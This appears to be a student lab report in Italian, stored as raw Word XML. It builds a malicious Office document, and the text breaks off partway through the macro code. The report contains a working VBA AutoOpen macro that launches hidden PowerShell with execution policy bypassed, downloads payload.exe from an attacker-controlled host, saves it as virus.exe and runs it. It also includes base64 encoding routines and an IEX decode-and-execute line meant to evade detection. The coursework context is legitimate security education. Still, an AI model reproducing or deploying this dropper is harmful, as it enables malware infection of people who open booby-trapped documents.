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938D3" w14:textId="18A87FCD" w:rsidR="002214D0" w:rsidRDefault="003D71C6" w:rsidP="003D71C6">
      <w:pPr>
        <w:pStyle w:val="Titolo"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>REPORT DOCUMENTO MALEVOLO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C0AF9C" w14:textId="77777777" w:rsidR="003D71C6" w:rsidRDefault="003D71C6" w:rsidP="003D71C6"/>
    <w:p w14:paraId="2EF8DCE0" w14:textId="77777777" w:rsidR="003D71C6" w:rsidRDefault="003D71C6" w:rsidP="003D71C6"/>
    <w:p w14:paraId="1C6004C7" w14:textId="257D8F29" w:rsidR="003D71C6" w:rsidRPr="003D71C6" w:rsidRDefault="003D71C6" w:rsidP="003D71C6">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D71C6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Nome Cognome</w:t>
      </w:r>
      <w:r w:rsidR="00DD1CDD">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Farina Christian</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA03550" w14:textId="75E93E31" w:rsidR="003D71C6" w:rsidRPr="003D71C6" w:rsidRDefault="003D71C6" w:rsidP="003D71C6">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D71C6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Matricola</w:t>
      </w:r>
      <w:r w:rsidR="00DD1CDD">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> VR501577</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F0AFDCD" w14:textId="1C12C789" w:rsidR="003D71C6" w:rsidRPr="003D71C6" w:rsidRDefault="003D71C6" w:rsidP="003D71C6">
      <w:pPr>
        <w:ind w:left="2880" w:firstLine="720"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D71C6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">              Email</w:t>
      </w:r>
      <w:r w:rsidR="00DD1CDD">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DD1CDD" w:rsidRPr="00DD1CDD">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>christian.farina@studenti.univr.it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F1FCD1" w14:textId="77777777" w:rsidR="003D71C6" w:rsidRDefault="003D71C6" w:rsidP="003D71C6"/>
    <w:p w14:paraId="0D217D35" w14:textId="77777777" w:rsidR="003D71C6" w:rsidRDefault="003D71C6" w:rsidP="003D71C6"/>
    <w:p w14:paraId="4FC7F742" w14:textId="4B7B28E8" w:rsidR="003D71C6" w:rsidRDefault="003D71C6" w:rsidP="003D71C6">
      <w:pPr>
        <w:pStyle w:val="Titolo1"/>
      </w:pPr>
      <w:r>
        <w:t>COMANDO POWERSHELL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F5717B" w14:textId="6F609D0D" w:rsidR="003D71C6" w:rsidRDefault="003D71C6" w:rsidP="003D71C6">
      <w:r>
        <w:t>In questa sezione dovete presentare il codice del comando Powershel e le tecniche adottate per codificarlo in base 64.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="214A3C87" w14:textId="294E138B" w:rsidR="003104B9" w:rsidRPr="003104B9" w:rsidRDefault="003104B9" w:rsidP="003D71C6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003104B9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>COMANDI POWERSHELL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA8DF82" w14:textId="616CDD2F" w:rsidR="003104B9" w:rsidRDefault="003104B9" w:rsidP="003104B9">
      <w:r>
        <w:t>comandoDaEseguire=</w:t>
      </w:r>
      <w:r w:rsidRPr="003104B9">
        <w:t xml:space="preserve"> "(New-Object Net.WebClient).DownloadFile('" &amp; "http://</w:t>
      </w:r>
      <w:r w:rsidR="00B046EC">
        <w:t>ipattaccante</w:t>
      </w:r>
      <w:r w:rsidRPr="003104B9">
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00B046EC">
        <w:t>porta</w:t>
      </w:r>
      <w:r w:rsidRPr="003104B9">
        <w:t>/payload.exe" &amp; "', '" &amp; "</w:t>
      </w:r>
      <w:r w:rsidR="00B046EC">
        <w:t>percorso</w:t>
      </w:r>
      <w:r w:rsidR="00B046EC" w:rsidRPr="003104B9">
        <w:t>\</w:t>
      </w:r>
      <w:r w:rsidR="00B046EC">
        <w:t>dove</w:t>
      </w:r>
      <w:r w:rsidR="00B046EC" w:rsidRPr="003104B9">
        <w:t>\</w:t>
      </w:r>
      <w:r w:rsidR="00B046EC">
        <w:t>voglio\salvare\</w:t>
      </w:r>
      <w:r w:rsidR="00B046EC" w:rsidRPr="003104B9">
        <w:t xml:space="preserve">virus.exe </w:t>
      </w:r>
      <w:r w:rsidRPr="003104B9">
        <w:t>" &amp; "')"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C89149C" w14:textId="27EAEF32" w:rsidR="003104B9" w:rsidRDefault="003104B9" w:rsidP="003104B9">
      <w:r>
        <w:t>comandoDaEseguire2=</w:t>
      </w:r>
      <w:r w:rsidRPr="003104B9">
        <w:t xml:space="preserve"> " &amp; '</w:t>
      </w:r>
      <w:r>
        <w:t>percorso</w:t>
      </w:r>
      <w:r w:rsidRPr="003104B9">
        <w:t>\</w:t>
      </w:r>
      <w:r>
        <w:t>dove</w:t>
      </w:r>
      <w:r w:rsidRPr="003104B9">
        <w:t>\</w:t>
      </w:r>
      <w:r>
        <w:t>è\salvato\</w:t>
      </w:r>
      <w:r w:rsidRPr="003104B9">
        <w:t>virus.exe'"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F67A99D" w14:textId="77777777" w:rsidR="003104B9" w:rsidRDefault="003104B9" w:rsidP="003104B9"/>
    <w:p w14:paraId="7C0D8C1B" w14:textId="42778151" w:rsidR="003104B9" w:rsidRPr="003104B9" w:rsidRDefault="003104B9" w:rsidP="003104B9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003104B9">
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t>' Esegui il comando PowerShell per scaricare il file malevolo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CCCD5DD" w14:textId="536A41F0" w:rsidR="003104B9" w:rsidRDefault="003104B9" w:rsidP="003104B9">
      <w:r>
        <w:t xml:space="preserve">    shell.Run "powershell.exe -NoProfile -ExecutionPolicy Bypass -Command " &amp; comandoDaEseguire, 0, True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C367CB0" w14:textId="07EAB4A4" w:rsidR="003104B9" w:rsidRPr="003104B9" w:rsidRDefault="003104B9" w:rsidP="003104B9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003104B9">
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t>' Esegui il comando PowerShell per eseguire il file malevolo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40197322" w14:textId="315A4315" w:rsidR="003104B9" w:rsidRDefault="003104B9" w:rsidP="003104B9">
      <w:r>
        <w:t xml:space="preserve">    shell.Run "powershell.exe -NoProfile -ExecutionPolicy Bypass -Command " &amp; comandoDaEseguire2, 0, True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D01C96" w14:textId="77777777" w:rsidR="00B046EC" w:rsidRDefault="00B046EC" w:rsidP="003104B9"/>
    <w:p w14:paraId="3136A730" w14:textId="67EEAB4B" w:rsidR="003104B9" w:rsidRDefault="003104B9" w:rsidP="003104B9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003104B9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TECNICHE DI CODIFICA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DAF0FB1" w14:textId="6CFABFC0" w:rsidR="003104B9" w:rsidRDefault="003104B9" w:rsidP="003104B9">
      <w:r w:rsidRPr="003104B9">
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:t>er la codifica ho utilizzato due metodi in VBA che codificano stringh</w:t>
      </w:r>
      <w:r w:rsidR="00B046EC">
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> date in input, in un contest reale le stringhe sarebbero state date direttamente codificate come input del decodificatore di VBA, tuttavia per fini didattici ho inserito I due metodi all’interno del codice del file malevolo per mostrarne il funzionamento. Il programma infatti esegue I seguenti passaggi:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5029751B" w14:textId="6FCDD971" w:rsidR="003104B9" w:rsidRDefault="003104B9" w:rsidP="003104B9">
      <w:r>
        <w:t>1 Inizializza le stringhe coi comandi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA9E15E" w14:textId="0DEAE9F9" w:rsidR="003104B9" w:rsidRDefault="003104B9" w:rsidP="003104B9">
      <w:r>
        <w:t>2 Codifica le stringhe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F5049C" w14:textId="1DD02D24" w:rsidR="003104B9" w:rsidRDefault="003104B9" w:rsidP="003104B9">
      <w:r>
        <w:t>3 Decodifica le stringhe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1597405E" w14:textId="216136C7" w:rsidR="003104B9" w:rsidRDefault="003104B9" w:rsidP="003104B9">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>4 Esegue I comandi decodificati</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E46305" w14:textId="6412F9CC" w:rsidR="00B046EC" w:rsidRDefault="00B046EC" w:rsidP="003104B9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B046EC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>METODI USATI PER CODIFICARE I COMANDI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B188209" w14:textId="77777777" w:rsidR="00B046EC" w:rsidRPr="00B046EC" w:rsidRDefault="00B046EC" w:rsidP="00B046EC">
      <w:pPr>
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B046EC">
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t>' codifica una stringa in input in base 64 e restituisce la stringa codificata</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56416919" w14:textId="77777777" w:rsidR="00B046EC" w:rsidRPr="00B046EC" w:rsidRDefault="00B046EC" w:rsidP="00B046EC">
      <w:r w:rsidRPr="00B046EC">
        <w:t>Function EncodeBase64(str As String) As String</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2669D3BA" w14:textId="77777777" w:rsidR="00B046EC" w:rsidRPr="00B046EC" w:rsidRDefault="00B046EC" w:rsidP="00B046EC">
      <w:r w:rsidRPr="00B046EC">
        <w:t xml:space="preserve">    Dim objXML As Object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3930455B" w14:textId="3E1592AA" w:rsidR="00B046EC" w:rsidRPr="00B046EC" w:rsidRDefault="00B046EC" w:rsidP="00B046EC">
      <w:r w:rsidRPr="00B046EC">
        <w:t xml:space="preserve">    Dim objNode As Object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BE17C38" w14:textId="77777777" w:rsidR="00B046EC" w:rsidRPr="00B046EC" w:rsidRDefault="00B046EC" w:rsidP="00B046EC">
      <w:pPr>
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B046EC">
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t xml:space="preserve">    ' Crea un oggetto XML</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="646720BF" w14:textId="77777777" w:rsidR="00B046EC" w:rsidRPr="00B046EC" w:rsidRDefault="00B046EC" w:rsidP="00B046EC">
      <w:r w:rsidRPr="00B046EC">
        <w:t xml:space="preserve">    Set objXML = CreateObject("MSXML2.DOMDocument")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA8C13C" w14:textId="03723921" w:rsidR="00B046EC" w:rsidRPr="00B046EC" w:rsidRDefault="00B046EC" w:rsidP="00B046EC">
      <w:r w:rsidRPr="00B046EC">
        <w:t xml:space="preserve">    Set objNode = objXML.createElement("b64")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="370A2664" w14:textId="77777777" w:rsidR="00B046EC" w:rsidRPr="00B046EC" w:rsidRDefault="00B046EC" w:rsidP="00B046EC">
      <w:pPr>
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B046EC">
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t xml:space="preserve">    ' Imposta il testo del nodo con il comando da codificare</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6F8D17" w14:textId="77777777" w:rsidR="00B046EC" w:rsidRPr="00B046EC" w:rsidRDefault="00B046EC" w:rsidP="00B046EC">
      <w:r w:rsidRPr="00B046EC">
        <w:t xml:space="preserve">    objNode.dataType = "bin.base64"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="730DCB4F" w14:textId="409A1ECC" w:rsidR="00B046EC" w:rsidRPr="00B046EC" w:rsidRDefault="00B046EC" w:rsidP="00B046EC">
      <w:r w:rsidRPr="00B046EC">
        <w:t xml:space="preserve">    objNode.nodeTypedValue = stringaABinario(str)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="733D89FC" w14:textId="77777777" w:rsidR="00B046EC" w:rsidRPr="00B046EC" w:rsidRDefault="00B046EC" w:rsidP="00B046EC">
      <w:pPr>
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B046EC">
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t xml:space="preserve">    ' Restituisci il risultato della codifica base64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257805B5" w14:textId="50481B66" w:rsidR="00B046EC" w:rsidRPr="00B046EC" w:rsidRDefault="00B046EC" w:rsidP="00B046EC">
      <w:r w:rsidRPr="00B046EC">
        <w:t xml:space="preserve">    EncodeBase64 = objNode.text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="087FB0BF" w14:textId="77777777" w:rsidR="00B046EC" w:rsidRPr="00B046EC" w:rsidRDefault="00B046EC" w:rsidP="00B046EC">
      <w:pPr>
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B046EC">
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t xml:space="preserve">    ' Libera l'oggetto XML</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25AC4783" w14:textId="77777777" w:rsidR="00B046EC" w:rsidRPr="00B046EC" w:rsidRDefault="00B046EC" w:rsidP="00B046EC">
      <w:r w:rsidRPr="00B046EC">
        <w:t xml:space="preserve">    Set objNode = Nothing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D4021F0" w14:textId="77777777" w:rsidR="00B046EC" w:rsidRPr="00B046EC" w:rsidRDefault="00B046EC" w:rsidP="00B046EC">
      <w:r w:rsidRPr="00B046EC">
        <w:t xml:space="preserve">    Set objXML = Nothing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C84630C" w14:textId="0062DA9E" w:rsidR="00B046EC" w:rsidRDefault="00B046EC" w:rsidP="00B046EC">
      <w:r w:rsidRPr="00B046EC">
        <w:t>End Function</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="307E6A1D" w14:textId="77777777" w:rsidR="00B046EC" w:rsidRDefault="00B046EC" w:rsidP="00B046EC"/>
    <w:p w14:paraId="7724E844" w14:textId="3F09416D" w:rsidR="00B046EC" w:rsidRPr="00B046EC" w:rsidRDefault="00B046EC" w:rsidP="00B046EC">
      <w:pPr>
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B046EC">
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t>' Converte una stringa in input in dati binari</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D91E2FB" w14:textId="72378CFE" w:rsidR="00B046EC" w:rsidRDefault="00B046EC" w:rsidP="00B046EC">
      <w:r>
        <w:t>Function stringaABinario(s As String) As Variant</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10BDA914" w14:textId="77777777" w:rsidR="00B046EC" w:rsidRDefault="00B046EC" w:rsidP="00B046EC">
      <w:r>
        <w:t xml:space="preserve">    Dim ado As Object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06819F7E" w14:textId="4716FF8C" w:rsidR="00B046EC" w:rsidRDefault="00B046EC" w:rsidP="00B046EC">
      <w:r>
        <w:t xml:space="preserve">    Set ado = CreateObject("ADODB.Stream")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D051CE" w14:textId="77777777" w:rsidR="00B046EC" w:rsidRDefault="00B046EC" w:rsidP="00B046EC">
      <w:r>
        <w:t xml:space="preserve">    ado.Type = 2 ' adTypeText</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13DF2C0C" w14:textId="77777777" w:rsidR="00B046EC" w:rsidRDefault="00B046EC" w:rsidP="00B046EC">
      <w:r>
        <w:t xml:space="preserve">    ado.Charset = "us-ascii"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A98486" w14:textId="77777777" w:rsidR="00B046EC" w:rsidRDefault="00B046EC" w:rsidP="00B046EC">
      <w:r>
        <w:t xml:space="preserve">    ado.Open</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="494E0369" w14:textId="77777777" w:rsidR="00B046EC" w:rsidRDefault="00B046EC" w:rsidP="00B046EC">
      <w:r>
        <w:t xml:space="preserve">    ado.WriteText s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E5C15D" w14:textId="77777777" w:rsidR="00B046EC" w:rsidRDefault="00B046EC" w:rsidP="00B046EC">
      <w:r>
        <w:t xml:space="preserve">    ado.Position = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1937EE0B" w14:textId="77777777" w:rsidR="00B046EC" w:rsidRDefault="00B046EC" w:rsidP="00B046EC">
      <w:r>
        <w:t xml:space="preserve">    ado.Type = 1 ' adTypeBinary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B3ECFF" w14:textId="77777777" w:rsidR="00B046EC" w:rsidRDefault="00B046EC" w:rsidP="00B046EC">
      <w:r>
        <w:t xml:space="preserve">    stringaABinario = ado.Read</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E97B3AD" w14:textId="77777777" w:rsidR="00B046EC" w:rsidRDefault="00B046EC" w:rsidP="00B046EC">
      <w:r>
        <w:t xml:space="preserve">    ado.Close</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD4C0CC" w14:textId="77777777" w:rsidR="00B046EC" w:rsidRDefault="00B046EC" w:rsidP="00B046EC">
      <w:r>
        <w:t xml:space="preserve">    Set ado = Nothing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E9CE8A" w14:textId="5856784C" w:rsidR="003D71C6" w:rsidRDefault="00B046EC" w:rsidP="003D71C6">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>End Function</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2169A9C8" w14:textId="76BCA4CE" w:rsidR="003D71C6" w:rsidRDefault="003D71C6" w:rsidP="003D71C6">
      <w:pPr>
        <w:pStyle w:val="Titolo1"/>
      </w:pPr>
      <w:r>
        <w:t>VBA MACRO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D811E03" w14:textId="29ACF36C" w:rsidR="003D71C6" w:rsidRDefault="003D71C6" w:rsidP="003D71C6">
      <w:r>
        <w:t>In questa sezione dovete presentare il codice della macro prima che venga offuscato, le tecniche adottate per offuscare il codice e il codice della macro offuscato.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D7FE8B" w14:textId="7453F25C" w:rsidR="00B046EC" w:rsidRDefault="00B046EC" w:rsidP="003D71C6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B046EC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CODICE MACRO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282CC623" w14:textId="77777777" w:rsidR="00B046EC" w:rsidRPr="00B046EC" w:rsidRDefault="00B046EC" w:rsidP="00B046EC">
      <w:r w:rsidRPr="00B046EC">
        <w:t>Sub AutoOpen()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B9F94A" w14:textId="77777777" w:rsidR="00B046EC" w:rsidRPr="00B046EC" w:rsidRDefault="00B046EC" w:rsidP="00B046EC">
      <w:r w:rsidRPr="00B046EC">
        <w:t xml:space="preserve">    Dim comandoDecodificato As String</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="719D7E25" w14:textId="77777777" w:rsidR="00B046EC" w:rsidRPr="00B046EC" w:rsidRDefault="00B046EC" w:rsidP="00B046EC">
      <w:r w:rsidRPr="00B046EC">
        <w:t xml:space="preserve">    Dim comandoDecodificato2 As String</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41FD51B8" w14:textId="03A8D63B" w:rsidR="00B046EC" w:rsidRPr="00B046EC" w:rsidRDefault="00B046EC" w:rsidP="00B046EC">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00B046EC">
        <w:t>Dim codificato As String</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E34D87C" w14:textId="77777777" w:rsidR="00B046EC" w:rsidRPr="00B046EC" w:rsidRDefault="00B046EC" w:rsidP="00B046EC">
      <w:r w:rsidRPr="00B046EC">
        <w:t xml:space="preserve">    Dim codificato2 As String</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C61E251" w14:textId="77777777" w:rsidR="00B046EC" w:rsidRPr="00B046EC" w:rsidRDefault="00B046EC" w:rsidP="00B046EC">
      <w:r w:rsidRPr="00B046EC">
        <w:t xml:space="preserve">    Dim comandoBase64 As String</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12340C07" w14:textId="77777777" w:rsidR="00B046EC" w:rsidRPr="00B046EC" w:rsidRDefault="00B046EC" w:rsidP="00B046EC">
      <w:r w:rsidRPr="00B046EC">
        <w:t xml:space="preserve">    Dim comandoDaEseguire As String</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71BE30C5" w14:textId="77777777" w:rsidR="00B046EC" w:rsidRPr="00B046EC" w:rsidRDefault="00B046EC" w:rsidP="00B046EC">
      <w:r w:rsidRPr="00B046EC">
        <w:t xml:space="preserve">    Dim comandoDaEseguire2 As String</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2861F9AB" w14:textId="77777777" w:rsidR="00B046EC" w:rsidRPr="00B046EC" w:rsidRDefault="00B046EC" w:rsidP="00B046EC">
      <w:r w:rsidRPr="00B046EC">
        <w:t xml:space="preserve">    Dim shell As Object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A7C57BB" w14:textId="785DCB83" w:rsidR="00B046EC" w:rsidRPr="00B046EC" w:rsidRDefault="00B046EC" w:rsidP="00B046EC">
      <w:r w:rsidRPr="00B046EC">
        <w:t xml:space="preserve">    Set shell = VBA.CreateObject("WScript.Shell")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3EA4E3" w14:textId="77777777" w:rsidR="00B046EC" w:rsidRPr="00B355D4" w:rsidRDefault="00B046EC" w:rsidP="00B046EC">
      <w:pPr>
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B355D4">
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t xml:space="preserve">    ' comando per scaricare il file malevolo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD876C1" w14:textId="63E6CDCC" w:rsidR="00B046EC" w:rsidRPr="00B046EC" w:rsidRDefault="00B046EC" w:rsidP="00B046EC">
      <w:r w:rsidRPr="00B046EC">
        <w:t xml:space="preserve">    comandoDecodificato = "(New-Object Net.WebClient).DownloadFile('" &amp; </w:t>
      </w:r>
      <w:r w:rsidR="00B355D4">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00B046EC">
        <w:t>"http://192.168.1.98:8000/payload.exe" &amp; "', '" &amp; "C:\Users\crist\Downloads\virus.exe" &amp; "')"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1750CD51" w14:textId="77777777" w:rsidR="00B046EC" w:rsidRPr="00B355D4" w:rsidRDefault="00B046EC" w:rsidP="00B046EC">
      <w:pPr>
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B355D4">
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t xml:space="preserve">    ' comando per eseguire il file malevolo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C139EF9" w14:textId="5A4D8013" w:rsidR="00B046EC" w:rsidRPr="00B046EC" w:rsidRDefault="00B046EC" w:rsidP="00B046EC">
      <w:r w:rsidRPr="00B046EC">
        <w:t xml:space="preserve">    comandoDecodificato2 = " &amp; 'C:\Users\crist\Downloads\virus.exe'"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C6692E" w14:textId="2EDCE917" w:rsidR="00B046EC" w:rsidRPr="00B355D4" w:rsidRDefault="00B046EC" w:rsidP="00B046EC">
      <w:pPr>
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B355D4">
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t xml:space="preserve">    ' codifico i comandi</w:t>
      </w:r>
      <w:r w:rsidR="00B355D4" w:rsidRPr="00B355D4">
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t xml:space="preserve"> (questa parte non dovrebb esserci, è solo a scopo dimostrativo)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41BE08CA" w14:textId="77777777" w:rsidR="00B046EC" w:rsidRPr="00B046EC" w:rsidRDefault="00B046EC" w:rsidP="00B046EC">
      <w:r w:rsidRPr="00B046EC">
        <w:t xml:space="preserve">    codificato = EncodeBase64(comandoDecodificato)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09078A22" w14:textId="646AB020" w:rsidR="00B046EC" w:rsidRPr="00B046EC" w:rsidRDefault="00B046EC" w:rsidP="00B046EC">
      <w:r w:rsidRPr="00B046EC">
        <w:t xml:space="preserve">    codificato2 = EncodeBase64(comandoDecodificato2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="014AEE35" w14:textId="2722C9EE" w:rsidR="00B046EC" w:rsidRPr="00B046EC" w:rsidRDefault="00B046EC" w:rsidP="00B046EC">
      <w:r w:rsidRPr="00B046EC">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00B355D4">
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t>' Comando PowerShell codificato in base64</w:t>
      </w:r>
      <w:r w:rsidR="00B355D4">
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t>, serve per convertire le stringhe da base64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67CADDC8" w14:textId="1DB1DF66" w:rsidR="00B046EC" w:rsidRPr="00B046EC" w:rsidRDefault="00B046EC" w:rsidP="00B046EC">
      <w:r w:rsidRPr="00B046EC">
        <w:t xml:space="preserve">    comandoBase64 = "IEX([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('BASE64_ENCODED_COMMAND')))"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CAB1D41" w14:textId="047E6431" w:rsidR="00B046EC" w:rsidRPr="00B355D4" w:rsidRDefault="00B046EC" w:rsidP="00B046EC">
      <w:pPr>
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B355D4">
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t xml:space="preserve">    ' decodifico i due comandi da base64 a normali</w:t>
      </w:r>
    </w:p>
